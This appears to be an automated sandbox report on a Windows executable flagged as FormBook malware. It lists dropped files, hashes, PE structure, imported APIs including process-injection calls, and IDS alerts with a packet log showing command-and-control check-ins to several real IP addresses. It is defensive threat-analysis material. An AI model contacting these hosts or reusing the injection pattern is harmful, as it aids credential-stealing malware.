C:\Users\user\AppData\Local\Temp\colliquefaction

Download File

Process:	C:\Users\user\Desktop\AuKUol8SPU.exe
File Type:	data
Category:	dropped
Size (bytes):	289280
Entropy (8bit):	7.995244987913894
Encrypted:	true
SSDEEP:	6144:/5VjRHm4/Vre1uwOgjL3oyH+XQCXP5x2SHgvMGLXQ8d9dAfxhP:/FG4tS1f9jLX+ACXPiSHgEOXQxX
MD5:	F6330A7821844ECDD6F6B136BB24F20F
SHA1:	D8FD3326BB62CDC13F47E1A582470613A810802F
SHA-256:	A90C9F32F24D631FB2B51299695686BEFBB93BC5525D4C0469B60F83BE51D3B1
SHA-512:	8D344CDA05BB232FB01B1B96D9A3122FD800F68CA9E64D33DD3702C359C1B8EAED90A37A18F1508349421651FC003898AA6DBB0CD4FB138E02D21434AFA1CDDA
Malicious:	false
Reputation:	low
Preview:	.b.IB388]RED..UH.0GPZFHD.0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFC.8MIO,.6Y.L.j.T....835h4(_ 1'.v[,'/\L.;7e6>(u!9....f%+>UiNKIr8MIA388 SL.v&2.jP .g&/.@..\|#1.W....X>._..i(0..99.u$=.GCFCV8MI.v88.SDD!I\|.W0GPZFHD.0EBMB]8M.E388YREDKF.\W0G@ZFH4^0GC.CV(MIA188_REDKFUHQ0GPZFHDZ@CCFAV8MIA3:8..ED[FUXW0GPJFHTZ0GCFCF8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDe200#0GP..LDZ GCF.R8MYA388YREDKFUHW0gPZ&HDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YR

C:\Users\user\AppData\Local\Temp\o3Z6161

Download File

Process:	C:\Windows\SysWOW64\wiaacmgr.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1221538113908904
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
MD5:	C1AE02DC8BFF5DD65491BF71C0B740A7
SHA1:	6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
SHA-256:	CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
SHA-512:	01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.196770152899761
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	AuKUol8SPU.exe
File size:	1'182'208 bytes
MD5:	7c5bc4b08a2079878caba5453e2716a9
SHA1:	be81a1498353a6717ad7ceba7642cfa4190cb33f
SHA256:	39ce493be8b616b0a5e0a7d96e1790789217833cac76f8d31cf73e6347d80916
SHA512:	de447aa18eef2b3bed22819cd82a08d9bbd5602f5193c04b69ae92c1f8e1b03985603e8b068b4c850cc69145b9e2059f0f0d07a6726ba12a51f0384df8435c13
SSDEEP:	24576:Ru6J33O0c+JY5UZ+XC0kGso6FasOfyAjAYRgfhNmCWY:Du0c++OCvkGs9FasOf8Y6fhwY
TLSH:	DD45BF22B3DEC361CB669173BF6973016EBF3C620630B95B2F881D79A960171166C763
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	8488c888cacac8ca

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x675B75BE [Thu Dec 12 23:46:06 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007FBCB4BE76BAh
jmp 00007FBCB4BDA484h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FBCB4BDA60Ah
cmp edi, eax
jc 00007FBCB4BDA96Eh
bt dword ptr [004C31FCh], 01h
jnc 00007FBCB4BDA609h
rep movsb
jmp 00007FBCB4BDA91Ch
cmp ecx, 00000080h
jc 00007FBCB4BDA7D4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FBCB4BDA610h
bt dword ptr [004BE324h], 01h
jc 00007FBCB4BDAAE0h
bt dword ptr [004C31FCh], 00000000h
jnc 00007FBCB4BDA7ADh
test edi, 00000003h
jne 00007FBCB4BDA7BEh
test esi, 00000003h
jne 00007FBCB4BDA79Dh
bt edi, 02h
jnc 00007FBCB4BDA60Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FBCB4BDA613h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FBCB4BDA665h
bt esi, 03h
jnc 00007FBCB4BDA6B8h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x581a8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x120000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x581a8	0x58200	dafad0d6314bd87353d52f9b85f62356	False	0.953728945035461	data	7.95001900971988	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x120000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc74b8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc75e0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc7708	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7830	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	English	Great Britain	0.5274822695035462
RT_ICON	0xc7c98	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	English	Great Britain	0.43855534709193245
RT_ICON	0xc8d40	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	English	Great Britain	0.4099585062240664
RT_MENU	0xcb2e8	0x50	data	English	Great Britain	0.9
RT_STRING	0xcb338	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcb8cc	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcbf58	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcc3e8	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcc9e4	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcd040	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcd4a8	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcd600	0x5166e	data			1.0003329114455555
RT_GROUP_ICON	0x11ec70	0x30	data	English	Great Britain	0.9166666666666666
RT_GROUP_ICON	0x11eca0	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x11ecb4	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x11ecc8	0x14	data	English	Great Britain	1.25
RT_VERSION	0x11ecdc	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x11edb8	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T20:25:41.028340+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	55717	185.199.108.153	80	TCP
2025-01-10T20:25:43.587770+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	55718	185.199.108.153	80	TCP
2025-01-10T20:25:46.171043+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	55719	185.199.108.153	80	TCP
2025-01-10T20:25:54.769932+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	55721	104.21.48.233	80	TCP
2025-01-10T20:25:54.769932+0100	2856318	ETPRO MALWARE FormBook CnC Checkin (POST) M4	1	192.168.2.9	55721	104.21.48.233	80	TCP
2025-01-10T20:25:57.362094+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	55722	104.21.48.233	80	TCP
2025-01-10T20:25:59.947079+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	55723	104.21.48.233	80	TCP
2025-01-10T20:26:08.025897+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	55725	199.59.243.228	80	TCP
2025-01-10T20:26:10.552403+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	55726	199.59.243.228	80	TCP
2025-01-10T20:26:13.091157+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	55727	199.59.243.228	80	TCP
2025-01-10T20:26:21.954980+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	55729	8.136.96.106	80	TCP
2025-01-10T20:26:24.470607+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	55730	8.136.96.106	80	TCP
2025-01-10T20:26:27.027328+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	55731	8.136.96.106	80	TCP
2025-01-10T20:26:35.237321+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	55733	69.57.163.64	80	TCP
2025-01-10T20:26:37.821174+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	55734	69.57.163.64	80	TCP
2025-01-10T20:26:40.397465+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	55735	69.57.163.64	80	TCP
2025-01-10T20:26:49.425188+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	55737	170.33.13.246	80	TCP
2025-01-10T20:26:51.757073+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	55738	170.33.13.246	80	TCP
2025-01-10T20:26:54.785439+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	55739	170.33.13.246	80	TCP
2025-01-10T20:27:03.181066+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	55741	66.235.200.145	80	TCP
2025-01-10T20:27:05.784485+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	55742	66.235.200.145	80	TCP
2025-01-10T20:27:08.287324+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	55743	66.235.200.145	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 20:25:24.463144064 CET	49954	80	192.168.2.9	104.21.36.239
Jan 10, 2025 20:25:24.468957901 CET	80	49954	104.21.36.239	192.168.2.9
Jan 10, 2025 20:25:24.469033003 CET	49954	80	192.168.2.9	104.21.36.239
Jan 10, 2025 20:25:24.479401112 CET	49954	80	192.168.2.9	104.21.36.239
Jan 10, 2025 20:25:24.484149933 CET	80	49954	104.21.36.239	192.168.2.9
Jan 10, 2025 20:25:24.969162941 CET	80	49954	104.21.36.239	192.168.2.9
Jan 10, 2025 20:25:24.970438957 CET	80	49954	104.21.36.239	192.168.2.9
Jan 10, 2025 20:25:24.970483065 CET	49954	80	192.168.2.9	104.21.36.239
Jan 10, 2025 20:25:24.972929955 CET	49954	80	192.168.2.9	104.21.36.239
Jan 10, 2025 20:25:24.978142977 CET	80	49954	104.21.36.239	192.168.2.9
Jan 10, 2025 20:25:32.221050978 CET	55714	53	192.168.2.9	162.159.36.2
Jan 10, 2025 20:25:32.225910902 CET	53	55714	162.159.36.2	192.168.2.9
Jan 10, 2025 20:25:32.226016045 CET	55714	53	192.168.2.9	162.159.36.2
Jan 10, 2025 20:25:32.233136892 CET	53	55714	162.159.36.2	192.168.2.9
Jan 10, 2025 20:25:32.693118095 CET	55714	53	192.168.2.9	162.159.36.2
Jan 10, 2025 20:25:32.698194027 CET	53	55714	162.159.36.2	192.168.2.9
Jan 10, 2025 20:25:32.698240042 CET	55714	53	192.168.2.9	162.159.36.2
Jan 10, 2025 20:25:40.540735006 CET	55717	80	192.168.2.9	185.199.108.153
Jan 10, 2025 20:25:40.545531988 CET	80	55717	185.199.108.153	192.168.2.9
Jan 10, 2025 20:25:40.545630932 CET	55717	80	192.168.2.9	185.199.108.153
Jan 10, 2025 20:25:40.561223030 CET	55717	80	192.168.2.9	185.199.108.153
Jan 10, 2025 20:25:40.566001892 CET	80	55717	185.199.108.153	192.168.2.9
Jan 10, 2025 20:25:40.988401890 CET	80	55717	185.199.108.153	192.168.2.9
Jan 10, 2025 20:25:41.028234959 CET	80	55717	185.199.108.153	192.168.2.9
Jan 10, 2025 20:25:41.028311014 CET	80	55717	185.199.108.153	192.168.2.9
Jan 10, 2025 20:25:41.028340101 CET	55717	80	192.168.2.9	185.199.108.153
Jan 10, 2025 20:25:41.028373957 CET	55717	80	192.168.2.9	185.199.108.153
Jan 10, 2025 20:25:42.072805882 CET	55717	80	192.168.2.9	185.199.108.153
Jan 10, 2025 20:25:43.099704981 CET	55718	80	192.168.2.9	185.199.108.153
Jan 10, 2025 20:25:43.106245041 CET	80	55718	185.199.108.153	192.168.2.9
Jan 10, 2025 20:25:43.106342077 CET	55718	80	192.168.2.9	185.199.108.153
Jan 10, 2025 20:25:43.121005058 CET	55718	80	192.168.2.9	185.199.108.153
Jan 10, 2025 20:25:43.125859022 CET	80	55718	185.199.108.153	192.168.2.9
Jan 10, 2025 20:25:43.564985037 CET	80	55718	185.199.108.153	192.168.2.9
Jan 10, 2025 20:25:43.587697029 CET	80	55718	185.199.108.153	192.168.2.9
Jan 10, 2025 20:25:43.587769985 CET	55718	80	192.168.2.9	185.199.108.153
Jan 10, 2025 20:25:44.635282993 CET	55718	80	192.168.2.9	185.199.108.153
Jan 10, 2025 20:25:45.654072046 CET	55719	80	192.168.2.9	185.199.108.153
Jan 10, 2025 20:25:45.660049915 CET	80	55719	185.199.108.153	192.168.2.9
Jan 10, 2025 20:25:45.660164118 CET	55719	80	192.168.2.9	185.199.108.153
Jan 10, 2025 20:25:45.675898075 CET	55719	80	192.168.2.9	185.199.108.153
Jan 10, 2025 20:25:45.683192015 CET	80	55719	185.199.108.153	192.168.2.9
Jan 10, 2025 20:25:45.686048985 CET	80	55719	185.199.108.153	192.168.2.9
Jan 10, 2025 20:25:46.144697905 CET	80	55719	185.199.108.153	192.168.2.9
